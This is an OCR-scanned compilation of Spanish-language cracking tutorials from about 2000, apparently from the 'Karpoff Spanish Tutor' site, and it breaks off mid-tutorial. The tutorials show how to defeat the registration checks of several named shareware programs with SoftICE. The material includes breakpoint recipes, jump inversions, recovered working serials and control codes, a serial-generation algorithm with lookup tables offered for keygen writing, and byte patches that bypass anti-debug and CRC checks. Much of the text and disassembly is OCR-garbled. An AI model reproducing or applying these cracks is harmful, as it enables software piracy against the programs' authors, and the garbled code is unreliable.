espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Wave Flow v 3.5 


Name / Serial 

Editor de audio y reproductor de CD 
Crea tus propios temas de escritorio 
Newbie 

www.waveflow.com 


file insPEctor v3.0 y Softice 4.05 
Act Mago FECHA: 


introduccion 


08/11/2000 


hola amigos, bienvenidos a mi octavo tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


potente editor de audio con más de 60 funciones y reproductor de cd. necesitas un editor de audio?ahora 
con wave flow tendrás un potente y útil editor de audio con una gran variedad de funciones. soporta múltiples 
ventanas (mdi), tiene una interfaz agradable y visual, y dispone de funciones como eco, reverberación, filtro 
avanzado (con previsualización del espectro), cambio de velocidad, y multitud de filtros y funciones para la mejora 
del ruido (tophat, mediana, media, ...). soporta los formatos .wav, .snd y .au, que son los más utilizados en internet 
para el sonido (audio). 


comentario sacado desde softonic debido a que no he tenido tiempo para utilizar el programa. 


lo que nos interesa... el programa es shareware con un valor de us$ 25. 


por suerte contamos con softice. 


al atake 


abrimos el programa y lo primero que vemos es esto: 


(c) Xavier Cirac 


SHAREWARE version 


hey !!, ya nos dimos cuenta que estos tipos no quieren que se nos olvide que no estamos registrados; ahora le damos click a 
register y ahora para entrar a la caja de registro le damos click a enter password , ya en la caja insertamos nuestro 
nombre y número de serie falso, en mi caso: 


login: act mago 
password: 1233321 


como hacemos siempre insertamos cualquier número de serie y le damos click a register y como el programa no es estúpido 
por supuesto que no aceptará los datos y mostrará algo así... 


Wave Flow SHAREWARE LX] 


BAD BOY/GIAL! 


Please register Wave Flow the next time. 


bonito mensaje... 
a continuación. ..cerramos wave flow. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrara si está encriptado y también en que leguaje está hecho.abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable (waveflow.exe) luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


Í 9, -= file insPEctor v3.0 - By VIPER [ K-FOR ] - Released 23/10/00 =- 


con la información que tenemos creo que el camino más fácil será usar nuestro querido softice para conseguir un código de 
registro válido. 


a continuación... cerramos file inspector v3.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos wave flow y vamos directamente a la caja de registro en donde introducimos nuestro nombre y 
cualquier número de serie. todavía no damos click en register ; lo que ahora debemos hacer es presionar control+d para 
que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f. 00471480 8b45f8 mov eax,[ebp-08] 

luego F1O 1 vez para llegar aquí: 

015f: 00471483 50 push eax 


creo que llegó la hora de preguntar : ) , si en esta línea colocamos d eax veremos en la window data nuestro código falso, 
en mi caso: 


1233321 

a continuación presionamos f10 8 veces para llegar aquí... 

015f: 00471410 58 pop eax 

si aquí colocamos d edx veremos en la window data lo siguiente: 


285172 


al parecer ya lo tenemos, pero cómo podemos estar tán seguros ? 

si presionas f10 2 veces llegarás aquí... 

015f: 00471426 Of8551010000 jnz v 

este salto nos manda más abajo, pero... qué pasaría si invertimos el salto colocando r fl z y a continuación presionamos f5 ? 
entonces veremos esto... 


Wave Flow SHAREWARE El 


G00D BOY¿GIALI 
Registered to: Mr. 4ct MagO 
Thanks for registering Wave Flow. 


nos hemos registrado sin colocar nuestro número de serie recogido en 015f: 00471410 58 pop eax colocando d edx, pero...el 
programa estará registrado al reiniciarlo ? 


probemos: cerramos el programa, luego lo abrimos y nos saluda una imagen que dice registered to: act mago, eso quiere 
decir que lo hemos crackeado satisfactoriamente. 


el registro se conservó en el programa porque este tiene en el directorio un archivo llamado wavedit.ini, sitio donde coloca 
el registro, entonces para probar el número que habíamos conseguido en 015f: 00471410 58 pop eax colocando d edx, 
debemos borrar el archivo wavedit.ini.. 


borramos el archivo, abrimos el programa y aparece la opción register, le damos click y ahora para entrar a la caja de 
registro le damos click a enter password , ya en la caja insertamos nuestros datos, en mi caso: 


login: act mago 
password: 285172 
damos click en Ok y ....... 
good boy/ girl! 
registered to: mr. act mago 
thanks for registering wave flow. 


programa crackeado... y tenemos nuestro propio número de serie. 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoGhotmail.com 


saludos 


saludos a tnt!. excelente página, muy buen trabajo...sigan adelante. especialmente a xasx, (no pararé : ) ) 
saludos a dek_oin. 


saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás) 


saludos a todos los crackers del mundo. 


chao !! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 


lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


act mago 2000 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2000 


Programa . Multimailer 3.x.x 

PROTECCION: Serial. 

Objetivo: Encontrar el serial. 

Descripcion: El programa sirve para enviar correo masivo por internet, especial para circulares. 

Dificultad: Facililla 

DOWNLOAD : http://www.webfacil.com 

Herramientas: Softice 

CRACKER: vinshuka FECHA: 29/11/2000 
introduccion 


el programa sirve para enviar correo masivo por internet, especial para circulares. 


se puede obtener desde http://www.webfacil.com. 


yo he crackeado este programa por dos motivos, el primero es que aunque tiene un precio moderado yo no tengo para pagarlo 
y no tengo tarjeta de crédito, lo otro es que desde que vi su primera versión desee crackearlo pero no pude hasta hoy (porque 
no sabia nada de nada, ahora se casi nada de algo =), este es el primero que crackeo sacándole un numero de serie valido. 


al atake 


bueno aquí les explico como lo crackie. 


(el bpx mas efectivo es el hmemcpy) 


ejecuto el winice, corro el multimailer 3.x.x, luego me dirijo a registrarme, introduzco todos los datos que me pide: 


nombre de registro: vinshuka (coloca tu nombre) 


licencia : 12345678 


código de control:stko (por santiasko de shile) 


luego hago control+d y aparezco en el winice, coloco bpx hmemcpy presiono enter y control+d. 


ahora hago click en aceptar y ahora quiebro en kernel!hmemcpy presiono f11 y aparezco en push word ptr[di], escribo 
bd* para que no quiebre nuevamente. 


ahora voy apretando f10 hasta llegar al código del multimailer (-multimail!code...-) sigo con £10 hasta encontrar la 
siguiente combrobacion cmp ebx,eax , donde ebx = al numero de licencia que he colocado (12345678), lo compruebo 
con ?ebx... y eax = al número de licencia valido para mi nombre, en este caso 220705. 


sigo con £10 hasta llegar a la pantalla de error. 


ahora escribo el numero de licencia válido o sea 220705, presiono control+d y escribo be* o bien be0 (para dejar 
activo el bpx hmemcpy), control + d y click en aceptar, repito el método del £10, cuando llego a la comprobación del 
numero de licencia ahora saltamos a 004956ac... 


cuando era erróneo ocurría esto 


cmp ebx, eax 


3z 0049564c (no jump) 


sigo lentamente con f10 hasta encontrar la siguiente comprobación: 

cmp al, 42 

jnz 00495874 

compruebo con 

?al 

242 

donde al = s (el primer carácter de mi código de control) y 42 = b(el primer carácter del código de control valido) 
ahora con control y flecha abajo busco más comprobaciones parecidas a esta, y me encuentro con las siguientes: 
emp al,43 

(mas abajo) 

cmp al,4b 

(mas abajo) 

cmp al,35 


(mas abajo) 


cmp al,31 
ya sé que al = un carácter de nuestro código de control y que 43h =c 4bh=k 35h=3 31h=1 


entonces recopilando todos esos al obtengo el código de control que coloque, y en 42,43,4b,35,31 los caracteres del 
código de control valido, o sea, bck51, pues bien ya tengo el registro valido, pongo be* (para borrar todos los bpx que 
tenga) y control+d, ahora introduzco los datos correctos, en este caso 


nombre de registro:vinshuka 
licencia:220705 

código de control:bck51 
excelente ya estoy registrado. 


(si ponemos menos de 5 caracteres en código de control o menos de 4 el nombre nos mandara directamente a la 
pantalla de error, revisar esto si te interesa, se puede hacer el generador de llaves, hasta ahora yo no se) 


por vinshuka santiasko de shile 2mil 
dudas o comentarios sobre este ensayo 


e-mail: vinshukaO spacemail.com 


url : http://vinshuka.tsx.org, 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Thumbs Plus 4.10 

PROTECCION: Name / Serial 

Objetivo: Obtener nuestro número y los datos para hacer un keygen 

Descripcion: Tratamiento de imágenes (en tamaño real y reducido) 

Dificultad: Facililla 

DOMNECADE http://cerious.com ó http://descriptions.newmail.ru/utilities.html 
(FOSI) 

Herramientas: Softice 

CRACKER: Caos reptante FECHA: 05/12/2000 


introduccion 


este programador va de mal en peor. primero daba la clave al registrarse (v.2), posteriormente supongo que 
mandaba el parche (v.3), en ambos casos concedía un período de prueba. pero ahora ya pide el serial 
number al instalar el programa. no sé donde vamos a llegar con tanta codicia... 


le castigaremos descubriendo nuestro serial number. por cierto: si bajamos el programa de fosi veremos 
que ya viene con un número, pero nosotros lo queremos registrado a nuestro nombre y además, queremos 
hacerlo con deportividad. j 


como este programa pide el número de registro durante el proceso de instalación, nos obliga a trabajar 
sobre archivos temporales, por lo que dadas mis notables limitaciones como cracker, dejaremos para otro 
momento el tema de parchearlo. 


así pues, trabajaremos exclusivamente con el softice, sin ayudarnos de ninguna otra herramienta. | 


al atake 


como he dicho antes, durante el proceso de instalación aparece la correspondiente ventana de registro. debemos 
introducir el número correcto si queremos continuar. como número, acostumbro a poner el de mi teléfono, es un 
número que me es familiar y que no se presta a confusión, ya que cadenas del tipo 12345... se encuentran en otros 
puntos que no tienen que ver con el que nos interesa, y las formadas por números repetidos tienen el inconveniente 
de no poder saber cual de los números está leyendo el programa en ese momento.¡ah! esta vez no he puesto mi 
número de teléfono -por modestia naturalmente- o sea que no llaméis preguntando por caos reptante, porque 
seguramente os mandarán a paseo... 


Registration Information 


Registration Information 


Please enter the name and registration code for 
ThumbsPlus version 4.10-R into the fields below. This 
information is contained in pour e-mailed license letter. 


User name or e-mail address: 


[Caos reptante 


Assigned registration code: 


[932345678 


< Back Cancel | 


antes de pulsar next, pulsaremos control-d para que aparezca el sice e introduciremos un breakpoint. probaremos con 
bpx getwindowtexta. pulsar f5 para volver al programa, next y ¡¡ploff!! estamos en el sice. otra vez f5 para que lea el 
código. ahora f12 para que termine de ejecutar la llamada y vuelva al programa principal. (vuelve a la primera) 

estamos en glkd393, este nombre varía cada vez que se ejecuta el programa de instalación pero el formato es siempre 
el mismo: gl_nnmn. (con bpx hmemcpy también habría funcionado pero el camino hasta aquí hubiera sido más largo). 


ahora localicemos en la memoria nuestro nombre y número. pondremos: s 30:00 | “caos reptante? y s 30:00 l 
TT 932345678' veremos que el nombre está en 0030:0066e930 y el número en 0030:0066€e430. recordad que si 
alguno de estos datos está situado en un lugar que no parece el apropiado, podemos seguir buscandolo introduciendo 
simplemente el comando s. el paso siguiente podría consistir en pillar al programa cuando está leyendo el nombre o 
el número. 


para ello estableceremos dos nuevos breakpoints (el anterior lo podemos borrar con bc * ó bc 0, o dejarlo inactivo 
con bd * ó bd 0) los cuales nos detectarán la lectura o escritura en los lugares ocupados por nuestros datos:bpr 
30:66e930 30:66e93c rw y bpr 30:66ea30 30:66ea38 rw. pulsamos f5 y aparecemos en kernel32. no nos interesa lo 
que pasa aquí, f12 un par de veces y estaremos en glcd385. (también es un nombre variable) a partir de aquí 
tracearemos pacientemente, y llegaremos a un punto interesante. 


¿9 


nota: las direcciones pueden variar. cuando "trabajé" el programa por primera vez la dirección siguiente era: 
0167:d810cd, al ejecutarlo ahora , la dirección es: 0167:008710cd. 


0167:008710cd movsx eax, byte ptr [edi] -—-dirección de la primera letra 
0167:008710d0 push eax 
0167:008710d1 call 871460 


0167:00871460 mov eax, [00877530] 

0167:00871465 sub esp, 08 

0167:00871468 test eax, eax 

0167:0087146a push ebx 

0167:0087146b 3jnz 0087148b 

0167:0087146d mov eax, [esp+10]---código ascii de la 1? letra, "c"=43 


0167:00871471 cmp eax, 61 -------- si el código de la letra está comprendido entre 
0167:00871474 31 00871559 -----=-=-- 61 y Ta, o sea, que es minúscula, le resta 20, 
0167:0087147a cmp eax, la -----=-=-- es decir que la convierte en mayúscula, en caso 
0167:0087147d 3g 00871559 -----=-=-=-= contrario, salta a 00871559. 

0167:00871483 sub eax, 20 

0167:00871486 pop ebx n ebx las 8 últimas cifras de nuestro número 


0167:00871487 add esp, 08 
0167:0087148a ret 


0167:00871559 pop ebx 
0167:0087155a add esp, 08 
0167:0087155d ret 


0167:008710d6 mov esi, eax pon n esi el código (43) 
0167:008710d8 mov eax, [00875324] 

0167:008710dd add esp, 04 

0167:008710e0 cmp eax, Ol 

0167:008710e3 jle 008710£5 


0167:008710f5 mov ecx, [00875118]-se pone en ecx la dirección de comienzo de la 1? tabla 
(875122) 

0167:008710fb mov ax, [esi*2+ecx]-(43*24+875122=8751a8)en esta dirección está el 

valor 81, el cual se pone en eax 

0167:008710ff and eax, 00000107 --81 and 107=1 

0167:00871104 test eax, eax 

0167:00871106 3z 0087111d 

0167:00871108 mov eax, esi 

0167:0087110a xor ecx, ecx 

0167:0087110c and eax, 000000ff -—-—-reduciría eax a dos cifras 

0167:00871111 not ebp bp pasa de 0 a f£fffffff 

0167:00871113 mov cl, [eax+00874098] -43 mas la dirección de comienzo de la 2? 

tabla es igual a 008740db (donde hay un 3 que se pone en ecx) 

0167:00871119 rol ebp,cl como ahora ebp vale ffffffff, no cambia al 

efectuar la rotacion de bits, en la segunda letra, 43 se desplazará 2 bits a la izquierda 


por lo que ebp=10c 


0167:0087111b xor ebp, eax (ff ffffff xor 43=ffffffbc)¡esto es importante! 
0167:0087111d mov al, [edi+01] ----61 (el código ascii de "a") 

0167:00871120 inc edi la dirección de "a" 

0167:00871121 test al, al -------- ¿es la última letra? 

0167:00871123 3jnz 008710cd ------- como no lo es, volvemos al inicio del bucle 


todo este berenjenal ha servido para colocar en el registro ebp un valor que se va a modificar al procesar cada letra 
de nuestro nombre. cuando termina de procesar todas las letras continuamos la ejecución del programa, en este 
momento, el valor de ebp (en mi caso) es 5406542a . 


0167:00871125 mov esi, [esp+00000214] 


0167:0087112c not ebp bp igual a abf%abd5 ¡que número tan bonito! 
0167:0087112e mov eax, ebx ahora eax contiene nuestro número 
0167:00871130 xor eax, ebp si esta comparación da cero, nos dará una 


licencia para 1 usuario, si no, seguirá comprobando... 


o sea que el primer número que encontramos es abf9abd5.(un usuario) 


0167:00871132 cmp eax, 12cb1419 --¡otro número bonito! 


este número debería dar cero con eax que contiene el número de serie "xoreado" con abf9abd5. así el número bueno 
sería: 

12cb1419 0001 0010 1100 1011 0001 0100 0001 1001 

abf9%abda5 1010 1011 1111 1001 1010 1011 1101 0101 

xor-=---> 1011 1001 0011 0010 1011 1111 1100 1100 


es decir: b932bfcc, que nos dará derecho a "200 seats" 


0167:00871137 ja 00871157 

0167:00871139 3z 0087114d 

0167:0087113b test eax, eax 

0167:0087113d 3jnz 00871240 ------- aaargh! 
0167:00871143 mov eax, 008750f4 

0167:00871148 jmp 00871245 ------- (1) j 
0167:0087114d mov eax, 008750€e8 

0167:00871152 3jmp 00871245 ------- (200 seats) j 


0167:00871157 cmp eax, 29a4f228 


con el mismo sistema que el anterior, veríamos que este número es 0253d59fd. (100 seats) 


0167:0087115c ja 0087117f 
0167:0087115e 3z 00871175 
0167:00871160 cmp eax, 15cb1419 


0167:00871165 3nz 00871240 ------- aaargh! 
0167:0087116b mov eax, 008750dc 
0167:00871170 3jmp 00871245 ------- (100 seats) J 


después de todo esto, espero que los "seats" por lo menos sean córdoba j 


todavía sigue con el reparto de premios ya que hay licencias para todo, desde la de un usuario a la ilimitada, así que 
podemos escoger la que queramos, pero vamos a dejarlo, que por hoy ya está bien. 


os habréis dado cuenta de que como toda esta movida es únicamente para instalar el programa, si se introduce el 
valor correcto en el registro eax (el que lleva nuestro número chungo) antes de la comprobación, nos aceptará el 
número y continuará con la instalación por lo que en teoría no lo necesitaríamos nunca más, pero es mejor tomar 
nota del número para el día que tengamos que formatear el disco duro y reinstalar windows desde cero. | 


he explicado el cálculo del número con cierto detalle, por si alguien se anima a hacer un keygen. 
solo falta ver las tablas: 


tabla 1 


0167:00875122 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 
0167:00871132 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 
0167:00875142 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 
0167:00875152 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 
0167:00875162 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 
0167:00875172 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 
0167:00875182 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 
0167:00875192 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 
0167:008751a2 10 00 81 00 81 00 81 00 81 00 81 00 81 00 01 00 


tabla 2 


0167:00874098 00 01 01 02 01 02 02 03 01 02 02 03 02 03 03 04 
0167:008740a8 01 02 02 03 02 03 03 04 02 03 03 04 03 04 04 05 
0167:008740b8 01 02 02 03 02 03 03 04 02 03 03 04 03 04 04 05 
0167:008740c8 02 03 03 04 03 04 04 05 03 04 04 05 04 05 05 06 
0167:008740d8 01 02 02 03 02 03 03 04 02 03 03 04 03 04 04 05 
0167:008740e8 02 03 03 04 03 04 04 05 03 04 04 05 04 05 05 06 


espero que este tutorial os sea de utilidad y os recuerdo que el crackear programas es sólo un ejercicio intelectual y 
que si Os parece que el programa vale la pena, debéis dirigiros al codicioso programador y pagarle esos dineros que 
tanta falta os hacen para que él se los reviente en chucherías para sus hijos. 


finalmente un saludo para todos aquellos que comparten sus conocimientos con los demás y especialmente a karpoff 
por el trabajo realizado. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Slow Speed CD Transcriber vl1.39b 


Código de registro. 

Simular estar registrados. 

No tiene. 

Casi Nula, Super Ultra Newbie 
http://www.ronimusic.com 

File insPEctor v3.0 y Softlce v4.05 


Act Mago FECHA: 24/11/2000 


INTRODUCCION 


hola amigos, presento mi décimo tercer tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 


actmagoO hotmail.com, como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 
otras cosas. en este tutorial volveremos a usar el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo 


decir : este texto ha sido escrito sólo con propósitos educacionales. 


se los quedo debiendo :) 


contamos con softice... 


al atake 


abrimos el programa y nos aparece un mensaje que dice algo así... 


nota! debes abastecer tu identificación de usuario cuando ordenes. user id: 2ee3ccc3 


y luego esto: 


sólo el segundo y tercer track están disponibles en la versión no registrada! lee el archivo order.txt para saber como ordenar 
la versión completa! 


ya en el programa vamos a help ----- >password y ahí nos encontramos con la caja de registro que luce así... 


Enter your password - User ID: 2EE3CCC3 E3 


pr 
DK | Cancel Help | 


insertamos cualquier cosa y damos click en ok y aunque por mala que sea la protección del programa, este no es tán 
estúpido para aceptarnos lo que hemos introducido y nos mostrará algo así... 


Slow Speed CD Transcriber 


/N Not a valid password! 


al darle click a aceptar el programa nos manda a order.txt automáticamente. ..como se puede ver estos tipos están ansiosos. 
nota: eso del id no me lo creo ni loco, tengo otro programa de la misma compañia y el id es el mismo. 
a continuación... cerramos slow speed cd transcriber., 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0el que nos mostrará los siguiente datos: 


el programa está desarrollado en microsoft visual c ++ 5.0 
no está encriptado 
no está empacado 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido softice para conseguir el 
password. 


a continuación... cerramos file inspector v3.0. 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos slow speed cd transcriber y vamos directamente a la caja de registro en donde introducimos nuestro 
código de registro. todavía no damos click enoK ; lo que ahora debemos hacer es presionar control+dpara que salte el 
softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx getdlgitemtexta y presionamos enter, luego presionamos f5 para salir del 
softice. ahora le damos click a0K y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamosf11 1 vez, para caer aquí... 

015f: 0040844c ese6ftdffff call 0O4081c0---->aquí está contenido el código ( presionamos f8 ) 

015f: 00408451 85C0 test eax, eaX -------=-=-=--- > algo se prueba :) 

015f: 00408453 7457 jz 0040842C Verna > nos manda al mensaje de registro aceptado, se puede comprobar con r fl z 
bueno ahora debemos presionar f8 para entrar en la call y caeremos aquí... 

015f: 004081c0 83ec50 sub esp, 50 

a continuación presionamos f10 10 veces para llegar aquí... 

015f: 004081e2 83c404 add esp, 04 --->colocamos d ecx y si bajamos unas lineas en la windowdata podremos ver el código 
y para los que le gusta la precisión... presionamos f10 19 veces para llegar aquí... 

015f: 00408222 68003e4200 push 00423e00 -------- >colocamos d eax = drt-yd3-zk98p 


ya lo hemos hecho, ahora sólo debemos colocar el password en la caja de registro y... 


Slow Speed CD Transcriber 


/N Thanks for registerina! 


programa crackeado... 


saludos a profesor x. ( gran amigo!!) 


saludos a dek_oin.( estamos locos!! ) 


saludos a IntIcrack!tteam ( saludos a xasx, no parare : ) ) http://www.tntcrackers. ws 


saludos a raziel. ( buen grupo el k-for) 


saludos a karpoff ( excelente página loco!!) http: //welcome.to/karpoff 


saludos y agradecimientos aV¡ p€ F del grupo [k-for] ,por el genial file inspector. 


saludos a toda la people de tutoriales2000. 


saludos al Idea ( monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, 
peter y a todos los demás) 


saludos a todos los crackers del mundo. 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 
ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 


DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Msd_loto 5.03 y Msd_quin 5.06 


Anti_debug, CRC y Serial 
Registrarnos 


Programas para hacerse "ricos" con las quinielas y/o bono-loto 
y/o primitiva ;) 


Avanzado. 


http://www.msdsoft.com 


SoftIce v4.05, IDA 4.04 Pro, Hiew 6.55 ó UltraEdit32 7.10a, 
UnLZEXE v0.9la, UN-PACK v1.9 


Crick FECHA: 22/11/2000 


¡¡ atención !! 


después de escribir este tutorial, alguien me escribió y me dijo que lo había probado, que había funcionado 
bien el tema del registro pero: algunas opciones del programa que graban datos a disco ¡¡¡ no lo hacían !!! 


volví a repasar el procedimiento y me dí cuenta de algunas cosas en las que no había reparado antes... 


podeis leerlo todo en la sección ¡¡ ahora sí que sí !! (al final del documento). 


de todas formas, espero que os ilustre el tema del hardpatching $ ) 


introduccion 


hola de nuevo. 

hace un par de semanas alguien escribió en es.comp.cracks un mensaje a crack el destripador pidiéndole el 
crack para estos programas. quejándose de que no había cracks para software español. 

como sé que crack (y marmota) están bastante liados con su pupe (por cierto, muy bueno!!) y, además, me 
picó la curiosidad porque se trata de programas para ms-dos (sí, todavía existen), decidí bajármelo y curiosear 


un poco... 


y este es el resultado... ;) 


al atake 


el programa, al instalarlo, crea dos subdirectorios: msd_quin y msd_loto. en cada uno de ellos encontramos a 
msd_quin.exe y msd_loto.exe, respectivamente. 

como tenía que empezar por alguno de ellos, me decidí por msd_quin.exe 

(tengo que decir que los dos están protegidos de igual forma. gracias, msdsoft ;) 


como siempre, lo primero es conseguir información sobre el programa. 
pasándolo por el unpack obtenemos: 


* msd_quin.exe is dos executable file (mz exe) 
* file size 98133 bytes 


ES a rs ca o LO 0012 


* entry point.............: $00015782 (87938) 
* lzexe v.0.90/1.00a (file ofs: $00015782) 
* unpacker not available <<<-- mentira. unlzexe v0.9la ;) 


¿comprimido con lzexe?. bueno, pues lo descomprimo con unlzexe 


¡houston, tenemos un problema!, el programa arranca pero al entrar en algunas opciones "casca". ¿por qué? no lo sé 
exactamente, pero me imagino que es porque el programa usa overlays y al descomprimirlo no funciona correctamente 


( 


es igual, ya sabemos descomprimir manualmente, ¿no? 


quiero hacer aquí un inciso. el programa lleva una protección anti-traza (¿por qué os empeñais en decir "traceo", con 
lo mal que suena) captura la int 01 y la int 03, con lo cual, si intentáis trazarlo, se os escurrirá de las manos. además, al 
ser un programa de ms-dos, el symbol loader no lo carga!!! (si estoy equivocado, rectificadme) entonces, ¿cómo coño 
lo paramos? pues, precísamente, con sus propias armas, con la int 03. (si alguien sabe alguna otra forma que me lo diga 


) 


(fin del inciso) 


editamos el msd_quin.exe con hiew o ultraedit32 
buscamos el punto de entrada (entry point: 15782) 
debe haber esto: 


06 push es 
0e push cs 


lo cambiamos por: 


cd03 int 03 ;) 


vamos a softice (ctrl+d) y capturamos la int 03 con i3here on 
salimos de softice (f5) y ejecutamos el programa. 

estamos en softice de nuevo, justo después de la int 03 que pusimos. 
ahora debemos dejar las cosas como estaban. escribimos: 


a eip-2 <intro> 
push es <intro> 
push cs <intro> 
<intro> 
r eip=eip-2 <intro> 
<<<--= el . nos sitúa en el eip actual, es decir, al principio de nuestro ejecutable. 


[FEA kk kk KK KK KK KK program entry point ****x*x*x*x 
:0001.0012 06 push es <<<-- debemos estar aquí 
:0001.0013 0e push cs 

:0001.0014 1f pop ds 

:0001.0015 8b0e0c00 mov cx, [000c] 

:0001.0019 8bf1 mov si, cx 

:0001.001b 4e dec si 

:0001.001c 89f7 mov di, si 

:0001.001e 8cdb mov bx, ds 

:0001.0020 031e0a00 add bx, [000a] 

:0001.0024 8ec3 mov es, bx 

:0001.0026 b400 mov ah, 00 

:0001.0028 3led xor bp, bp 

:0001.002a fd std 

:0001.002b ac lodsb 

:0001.002c 01c5 add bp, ax 

:0001.002e aa stosb 

:0001.002f e2fa loop 002b <<<-- relocalización del código 
:0001.0031 8b160e00 mov dx, [000e]  <<<-- cra 
:0001.0035 B8ac2 mov al , dl 

:0001.0037 29c5 sub bp, ax 

:0001.0039 8acó6 mov al , dh 

:0001.003b 29c5 sub bp, ax 

:0001.003d 39d5 cmp bp, dx <<<-—- comprobación del crec 
:0001.003f 740c je 004d 

:0001.0041 ba9101 mov dx, 0191 <<<-- si no es correcto el crc nos echan :( 
:0001.0044 b409 mov ah, 09 

:0001.0046 cd21 int 21 

:0001.0048 b8ff4c mov ax, 4cff 

:0001.004b cd21 int 21 

:0001.004d 53 push bx 

:0001.004e b85300 mov ax, 0053 

:0001.0051 50 push ax 

:0001.0052 cb retf <<<-—- saltamos al código ya reubicado. 


la comprobación de crc se puede saltar olímpicamente. 
cambiamos el: 740c je 004d 

por: eb0c jmp 004d 

... y Solucionado. 


a partir de aquí la cosa se complica, hay que encontrar el salto al programa principal original. 
si trazamos saltándonos los bucles llegamos a: 


:0001.0188 fa cli 

:0001.0189 8ed6 mov ss, si 

:0001.018b 8be7 mov sp, di 

:0001.018d fb sti 

:0001.018e 2eff2f jmp far word ptr cs: [bx] <<<-- te pillé 


bueno, ¿y qué? 

pues ahora viene lo jodío: encontrarle un punto flaco al programa. 

lo de buscar un número de clave correcto lo deseché enseguida, las rutinas de encriptación de claves me aburren :( 
si lo intentáis, cuidadín con las int 01 e int 03 !!! (deshabilitadlas en softice con ilhere off e i3here off) 

después de varias horas código arriba, código abajo :/ llegareis a esto: 


:0001.c1b5 9a87002ald call 1d2a:0087 
:0001.clba 8b867eff mov ax, [bp+ff7e] 
:0001.clbe 3b06dd23 cmp ax, [23dd] 
:0001.c1c2 750e jne cld2 

:0001.c1c4 8b867cff mov ax, [bp+ff7c] 
:0001.c1c8 3b06df23 cmp ax, [23df] 
:0001.cl1cc 7504 jne cld2 

:0001.c1ce b000 mov al, 00 

:0001.c1d0 eb02 jmp cl1d4 

:0001.c1d2 b001 mov al, 01 <<<-- punto "g" 
:0001.c1d4 a2e123 mov byte ptr [23e1l], al 
:0001.c1d7 a0el23 mov al, [23e1] 
:0001.clda 50 push ax 

:0001.cldb 9a00002ald call 1d2a:0000 
:0001.c1e0 08c0 or al , al 

:0001.cle2 752a jne c20e 


podemos ver el típico flag en al: (0/1) 
¿Qué pasaría si lo forzamos a 0? 
podemos editar el código con el softice así: 


a c1d2 <intro> 
mov al, 0<intro> 
<intro> 


si continuamos la ejecución con f5 nos podremos registrar !!! 


claro que... 

¿cómo modificamos el código si está en la parte comprimida del programa y, además, el programa descomprimido con 
unlzexe no funciona !!!1122999 

